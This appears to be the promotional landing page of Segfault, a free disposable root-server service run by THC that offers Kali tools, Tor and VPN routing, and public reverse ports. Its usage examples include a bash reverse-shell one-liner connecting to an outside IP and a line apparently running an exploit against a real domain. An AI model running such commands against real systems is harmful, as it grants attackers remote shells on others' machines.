Making the world suck less one
TCP packet at a time...
Log in
ssh root@segfault.net # The password is 'segfault'
NEW: Start a Remote Desktop inside your Browser.
What it does
Segfault offers free unlimited Root Servers. A new server (inside a Virtual Machine) is created for every SSH connection.
- Dedicated
Root Server
for every user. - Pre-installed tools on Kali-Linux.
- Outgoing traffic is routed through NordVPN/CryptoStorm/Mullvad.
- Reverse TCP/UDP port on a public IP.
- Transparent TOR to connect to
.onion
addresses. - Log in via
.onion
,.gsocket
or directssh
(port 22 or 443). - Encrypted DNS traffic (DNS over HTTPS).
- Pre-configured
.onion
web server. Just put your files in /onion. - Encrypted storage in
/sec
and/home
with your password. - Encrypted storage is only accessible while you are logged in. Keys are wiped on log out.
- Only the user can decrypt the data. We do not have the key.
- No Logs.
Show me!
The servers are a great place to compile stuff and to test stuff.
Install any app you like:
apt install nmap && nmap -thc
Work the Internet
ping 1.1.1.1
curl ipinfo.io | jq
ssh blah@anotherserver.com
./7350-sshx3-expl openbsd.org
Publish your webpage on the Darknet:
# Share files anonymously:
echo "My First File Shared on The Onion Router (TOR) network" >/onion/helloworld.txt
# Or publish a full webpage (using Markdown syntax):
# Edit your webpage in /sec/www/content/*.md and then publish them:
cd /sec/www && make html
Start Firefox or a Remote Desktop X11/GUI:
startxvnc
Work the DarkNet:
w3m http://6nhmgdpnyoljh5uzr5kwlatx2u3diou4ldeommfxjz3wkhalzgjqxzqd.onion/
ssh root@ta6kb6vqm3vd7vlgvf7k4nbhfzst2yfy52t6dqzmz2plteewn7ynmtad.onion
Connect to IRCNet:
su user -c "irssi -c ircnet -n MyNickName"
We allow port forwarding and proxies:
ssh -D 127.0.0.1:1080 root@segfault.net
# then from another Terminal on your workstation:
curl -x socks5h://0 ipinfo.io
curl -x socks5h://0 http://6nhmgdpnyoljh5uzr5kwlatx2u3diou4ldeommfxjz3wkhalzgjqxzqd.onion/
Connect to your own public PORT:
# On your server:
nc -vnlp 34868 # Find your IP & PORT during first log in.
# On another server start a connect back reverse shell to your IP & PORT:
setsid bash -i &>/dev/tcp/185.117.118.23/34868 0>&1 &
How it works
Read the FAQ and join us on Telegram or read the source on GitHub.
This is a free service and there are some restrictions in place. You may want to upgrade your server and go unrestricted.
Similar Services
- SDF Public Access Unix
- xShellz
- WindowsOnFly
- OnWorks
- FreeShell
- Oracle Cloud Free Tier
- Play With Docker
- Trash.net
- Tilde.club
- Project SF
- and many others…
Love Research. Hate Abuse.
We do not tolerate abuse. Contact us on Telegram or email root at thc.org if you have any concerns.
Contact
X.com: https://x.com/hackerschoice
Mastodon: @thc@infosec.exchange
Telegram: https://t.me/thcorg
Web: https://www.thc.org
Medium: https://medium.com/@hackerschoice
Hashnode: https://iq.thc.org/
Abuse: https://thc.org/abuse
E-Mail: members@proton.thc.org
Signal: ask
SimpleX: ask